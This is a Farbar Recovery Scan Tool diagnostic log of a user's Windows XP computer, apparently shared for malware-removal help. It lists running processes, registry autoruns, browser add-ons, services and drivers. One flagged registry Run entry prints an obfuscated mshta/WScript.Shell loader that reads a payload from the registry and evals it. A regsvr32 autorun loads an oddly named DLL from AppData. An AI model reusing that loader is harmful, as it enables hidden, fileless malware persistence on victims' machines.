Geny Baker
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:07-11-2015
Ran by Geny (administrator) on GENY-380 (14-11-2015 20:31:57)
Running from D:\My Docs\Downloads
Loaded Profiles: Geny (Available Profiles: Geny)
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) Language: English (United States)
Internet Explorer Version 8 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AVG Technologies CZ, s.r.o.) C:\PROGRA~1\AVG\Av\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgcsrvx.exe
() C:\WINDOWS\system32\WLTRYSVC.EXE
(Dell Inc.) C:\WINDOWS\system32\BCMWLTRY.EXE
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Framework\Common\avgsvcx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgwdsvcx.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Fitbit, Inc.) C:\Program Files\Fitbit Connect\FitbitConnectService.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.28.15\GoogleCrashHandler.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgnsx.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Realtek Semiconductor Corp.) C:\WINDOWS\RTDCPL.EXE
(Intel Corporation) C:\WINDOWS\system32\hkcmd.exe
(Intel Corporation) C:\WINDOWS\system32\igfxsrvc.exe
(Intel Corporation) C:\WINDOWS\system32\igfxpers.exe
(Dell Inc.) C:\WINDOWS\system32\WLTRAY.EXE
(CyberLink Corp.) C:\Program Files\PowerDVD DX\PDVDDXSrv.exe
(Citrix Systems, Inc.) C:\Program Files\Citrix\ICA Client\concentr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(Citrix Systems, Inc.) C:\Program Files\Citrix\ICA Client\wfcrun32.exe
(Nero AG) C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgui.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Prolific Technology Inc.) C:\WINDOWS\system32\IoctlSvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Logitech, Inc.) C:\Program Files\Common Files\logishrd\KHAL3\KHALMNPR.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Framework\Common\avguix.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\cmd.exe
(Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
(Microsoft Corporation) C:\WINDOWS\system32\PresentationHost.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDCPL] => C:\WINDOWS\RTDCPL.EXE [2691072 2009-08-26] (Realtek Semiconductor Corp.)
HKLM\...\Run: [Broadcom Wireless Manager UI] => C:\WINDOWS\system32\WLTRAY.exe [2498560 2010-03-30] (Dell Inc.)
HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\PowerDVD DX\PDVDDXSrv.exe [128232 2009-09-11] (CyberLink Corp.)
HKLM\...\Run: [NeroFilterCheck] => C:\Program Files\Common Files\Nero\Lib\NeroCheck.exe [570664 2008-04-28] (Nero AG)
HKLM\...\Run: [NBKeyScan] => C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe [2221352 2008-02-18] (Nero AG)
HKLM\...\Run: [ConnectionCenter] => C:\Program Files\Citrix\ICA Client\concentr.exe [300472 2010-05-12] (Citrix Systems, Inc.)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-03-20] (Apple Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\Av\avgui.exe [3826600 2015-10-30] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [2296600 2013-07-31] (Logitech, Inc.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\qttask.exe [421888 2014-10-02] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [157480 2015-04-06] (Apple Inc.)
HKLM\...\Run: [AvgUi] => C:\Program Files\AVG\Framework\Common\avguix.exe [1130408 2015-10-16] (AVG Technologies CZ, s.r.o.)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll [2013-06-13] (Logitech, Inc.)
HKLM\...\Policies\Explorer\Run: [**27da8125<*>] => mshta javascript:ZXCBOya0="kcWtjWWr7";S2a1=new%20ActiveXObject("WScript.Shell");kmdIO6x7e="3P3p1lzn";cue5X8=S2a1.RegRead("HKLM\\software\\056439a146\\8c68058d");XfgI4iLgH="vPeg49";eval(cue5X8);LJ9JHh7 (the data entry has 11 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer: [NoCDBurning] 0
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [Google Update] => C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [107912 2014-10-22] (Google Inc.)
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-11-07] (Google Inc.)
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [ROC_ROC_APR2013_AV] => C:\Documents and Settings\Geny\Application Data\AVG April 2013 Campaign\AVG-Secure-Search-Update.exe /PROMPT --mid f48fdd4ec99747d0be2cd16c22205815-8c828015d3fdf0ecc5373bcc2149ea8f601d3340 --CMPID ROC (the data entry has 29 more characters).
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [AVG-Secure-Search-Update_0913a] => C:\Documents and Settings\Geny\Application Data\AVG 0913a Campaign\AVG-Secure-Search-Update-0913a.exe /PROMPT --mid f48fdd4ec99747d0be2cd16c22205815-8c828015d3fdf0ecc5373bcc2149ea8f601d3340 --CMPID 09 (the data entry has 3 more characters).
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [AVG-Secure-Search-Update_1113a] => C:\Documents and Settings\Geny\Application Data\AVG 1113a Campaign\AVG-Secure-Search-Update-1113a.exe /PROMPT /mid=f48fdd4ec99747d0be2cd16c22205815-8c828015d3fdf0ecc5373bcc2149ea8f601d3340 /CMPID=1113 (the data entry has 1 more characters).
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [uTorrent] => C:\Documents and Settings\Geny\Application Data\uTorrent\uTorrent.exe [1822048 2015-10-13] (BitTorrent Inc.)
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\qttask.exe [421888 2014-10-02] (Apple Inc.)
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [{F9D772C4-AD01-40E2-BACC-F7300FE9592E}] => regsvr32.exe "C:\Documents and Settings\Geny\Application Data\Quyitv\CofeDxun.dll"
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\MountPoints2: {4eee6362-2ae8-11e0-9d51-002564c4b1e6} - G:\setupSNK.exe
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\MountPoints2: {b5ec1652-5a4f-11df-9d22-002564c4b1e6} - F:\LaunchU3.exe -a
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\scrnsave.scr [9216 2008-04-14] (Microsoft Corporation)
BootExecute: autocheck autochk * C:\PROGRA~1\AVG\Av\avgrsx.exe /sync /restart
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Winsock: Catalog5 04 C:\Program Files\Bonjour\mdnsNSP.dll [121704 2011-08-30] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 205.171.2.65
Tcpip\..\Interfaces\{7203B3FB-70D8-4079-B244-FA1D5DDCC534}: [DhcpNameServer] 192.168.0.1 205.171.2.65
Internet Explorer:
==================
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.facebook.com/
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
URLSearchHook: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 - Zynga Toolbar - {7b13ec3e-999a-4b70-b9cb-2617b8323822} - C:\Program Files\Zynga\prxtbZyn0.dll (Conduit Ltd.)
SearchScopes: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> DefaultScope {EAF435F9-2BE3-42DD-B5F5-2785466D295F} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}&rlz=1I7ADFA_enUS404
SearchScopes: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> {91D0C420-E910-4A17-BE98-51976FED3BC7} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> {EAF435F9-2BE3-42DD-B5F5-2785466D295F} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}&rlz=1I7ADFA_enUS404
BHO: ContributeBHO Class -> {074C1DC5-9320-4A9A-947D-C042949C6216} -> C:\Program Files\Adobe\/Adobe Contribute CS4/contributeieplugin.dll [2008-09-10] (Adobe Systems Incorporated.)
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-01-03] (Adobe Systems Incorporated)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files\AVG\AVG2012\avgssie.dll => No File
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26] (Microsoft Corporation)
BHO: Zynga Toolbar -> {7b13ec3e-999a-4b70-b9cb-2617b8323822} -> C:\Program Files\Zynga\prxtbZyn0.dll [2013-07-09] (Conduit Ltd.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-03-30] (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-09-23] (Google Inc.)
BHO: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
BHO: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
BHO: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
Toolbar: HKLM - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
Toolbar: HKLM - Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files\Adobe\/Adobe Contribute CS4/contributeieplugin.dll [2008-09-10] (Adobe Systems Incorporated.)
Toolbar: HKLM - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
Toolbar: HKLM - Zynga Toolbar - {7b13ec3e-999a-4b70-b9cb-2617b8323822} - C:\Program Files\Zynga\prxtbZyn0.dll [2013-07-09] (Conduit Ltd.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-09-23] (Google Inc.)
Toolbar: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> Zynga Toolbar - {7B13EC3E-999A-4B70-B9CB-2617B8323822} - C:\Program Files\Zynga\prxtbZyn0.dll [2013-07-09] (Conduit Ltd.)
Toolbar: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-09-23] (Google Inc.)
DPF: {32C3FEAE-0877-4767-8C20-62A5829A0945} hxxp://static.ak.facebook.com/fbplugin/win32/axfbootloader.cab?1270703312359
DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} hxxp://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1269983539687
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG2012\avgpp.dll No File
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Filter: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll [2010-05-12] (Citrix Systems, Inc.)
Filter: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll [2010-05-12] (Citrix Systems, Inc.)
FireFox:
========
FF ProfilePath: C:\Documents and Settings\Geny\Application Data\Mozilla\Firefox\Profiles\59nmg3h4.default
FF DefaultSearchEngine: Google
FF DefaultSearchEngine.US: Google
FF Homepage: hxxps://www.lds.org/
FF Keyword.URL:
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_19_0_0_226.dll [2015-10-28] ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files\Microsoft\Office Live\npOLW.dll [2010-04-26] (Microsoft Corp.)
FF Plugin: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2009-07-10] (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-23] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-23] (Google Inc.)
FF Plugin: Adobe Acrobat -> C:\Program Files\Adobe\Acrobat 9.0\Acrobat\Air\nppdf32.dll [2013-05-08] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1454471165-790525478-1801674531-1003: @facebook.com/FBPlugin,version=1.0.3 -> C:\Documents and Settings\Geny\Application Data\Facebook\npfbplugin_1_0_3.dll [2010-03-05] ( )
FF Plugin HKU\S-1-5-21-1454471165-790525478-1801674531-1003: @talk.google.com/GoogleTalkPlugin -> C:\Documents and Settings\Geny\Application Data\Mozilla\plugins\npgoogletalk.dll [2014-10-03] (Google)
FF Plugin HKU\S-1-5-21-1454471165-790525478-1801674531-1003: @talk.google.com/O1DPlugin -> C:\Documents and Settings\Geny\Application Data\Mozilla\plugins\npo1d.dll [2014-10-03] (Google)
FF Plugin HKU\S-1-5-21-1454471165-790525478-1801674531-1003: @tools.google.com/Google Update;version=3 -> C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Update\1.3.24.15\npGoogleUpdate3.dll [No File]
FF Plugin HKU\S-1-5-21-1454471165-790525478-1801674531-1003: @tools.google.com/Google Update;version=9 -> C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Update\1.3.24.15\npGoogleUpdate3.dll [No File]
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\CCMSDK.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\cgpcfg.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\CgpCore.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\confmgr.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctxlogging.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctxmui.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\icafile.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\icalogon.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npicaN.dll [2010-05-12] ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npMozCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2013-05-08] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll [2015-02-12] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll [2015-02-12] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll [2015-02-12] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll [2015-02-12] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll [2015-02-12] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin6.dll [2012-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin7.dll [2012-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\sslsdk_b.dll [2010-04-14] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\TcpPServ.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Documents and Settings\Geny\Application Data\mozilla\plugins\npgoogletalk.dll [2014-10-03] (Google)
FF Plugin ProgramFiles/Appdata: C:\Documents and Settings\Geny\Application Data\mozilla\plugins\npo1d.dll [2014-10-03] (Google)
FF Extension: Garmin Communicator - C:\Documents and Settings\Geny\Application Data\Mozilla\Firefox\Profiles\59nmg3h4.default\Extensions\{195A3098-0BD5-4e90-AE22-BA1C540AFD1E} [2015-05-30]
FF Extension: Microsoft .NET Framework Assistant - C:\Documents and Settings\Geny\Application Data\Mozilla\Firefox\Profiles\59nmg3h4.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-05-29] [not signed]
FF Extension: Zynga - C:\Documents and Settings\Geny\Application Data\Mozilla\Firefox\Profiles\59nmg3h4.default\Extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822} [2015-07-15] [not signed]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2010-03-30] [not signed]
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\itms.js [2014-10-08]
Chrome:
=======
CHR StartupUrls: Default -> "hxxps://www.lds.org/?lang=eng"
CHR Profile: C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-05-02]
CHR Extension: (Google Docs) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-05-02]
CHR Extension: (Google Drive) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-26]
CHR Extension: (YouTube) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-29]
CHR Extension: (Google Sheets) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-05-02]
CHR Extension: (Google Docs Offline) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-12]
CHR Extension: (Chrome Web Store Payments) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-20]
CHR Extension: (Gmail) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-05-02]
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 Adobe Version Cue CS4; C:\Program Files\Common Files\Adobe\Adobe Version Cue CS4\Server\bin\VersionCueCS4.exe [288112 2010-03-31] (Adobe Systems Incorporated)
S3 AvgAMPS; C:\Program Files\AVG\Av\avgamps.exe [595376 2015-10-30] (AVG Technologies CZ, s.r.o.)
R2 AVGIDSAgent; C:\Program Files\AVG\Av\avgidsagent.exe [3815648 2015-10-30] (AVG Technologies CZ, s.r.o.)
R2 avgsvc; C:\Program Files\AVG\Framework\Common\avgsvcx.exe [862632 2015-10-16] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\Av\avgwdsvcx.exe [579776 2015-10-30] (AVG Technologies CZ, s.r.o.)
R2 Fitbit Connect; C:\Program Files\Fitbit Connect\FitbitConnectService.exe [1435680 2014-01-10] (Fitbit, Inc.) [File not signed]
S2 HPSupportSolutionsFrameworkService; C:\Program Files\Hp\Common\HPSupportSolutionsFrameworkService.exe [89840 2015-03-28] (Hewlett-Packard Company)
R2 Net Driver HPZ12; C:\WINDOWS\system32\HPZinw12.dll [44032 2009-05-14] (Hewlett-Packard) [File not signed]
R2 PLFlash DeviceIoControl Service; C:\WINDOWS\system32\IoctlSvc.exe [81920 2006-12-19] (Prolific Technology Inc.) [File not signed]
R2 Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.dll [53760 2009-05-14] (Hewlett-Packard) [File not signed]
R2 wltrysvc; C:\WINDOWS\System32\bcmwltry.exe [2232320 2010-03-30] (Dell Inc.) [File not signed]
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R1 Avgdiskx; C:\WINDOWS\System32\DRIVERS\avgdiskx.sys [156080 2015-08-10] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriverl; C:\WINDOWS\System32\DRIVERS\avgidsdriverlx.sys [243632 2015-10-19] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\WINDOWS\System32\DRIVERS\avgidshx.sys [231344 2015-08-20] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\WINDOWS\System32\DRIVERS\avgidsshimx.sys [31664 2015-08-14] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\WINDOWS\System32\DRIVERS\avgldx86.sys [229296 2015-10-21] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\WINDOWS\System32\DRIVERS\avglogx.sys [308656 2015-08-14] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\WINDOWS\System32\DRIVERS\avgmfx86.sys [192944 2015-10-21] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\WINDOWS\System32\DRIVERS\avgrkx86.sys [36784 2015-08-10] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\WINDOWS\System32\DRIVERS\avgtdix.sys [231856 2015-10-08] (AVG Technologies CZ, s.r.o.)
S3 BCM43XX; C:\WINDOWS\System32\DRIVERS\bcmwl5.sys [2649216 2010-03-30] (Broadcom Corporation)
S3 CCDECODE; C:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-13] (Microsoft Corporation)
R2 fssfltr; C:\WINDOWS\System32\DRIVERS\fssfltr_tdi.sys [54752 2009-08-05] (Microsoft Corporation)
S3 HPZid412; C:\WINDOWS\System32\DRIVERS\HPZid412.sys [49920 2008-10-28] (HP)
S3 HPZipr12; C:\WINDOWS\System32\DRIVERS\HPZipr12.sys [16496 2008-10-28] (HP)
S3 HPZius12; C:\WINDOWS\System32\DRIVERS\HPZius12.sys [21568 2008-10-28] (HP)
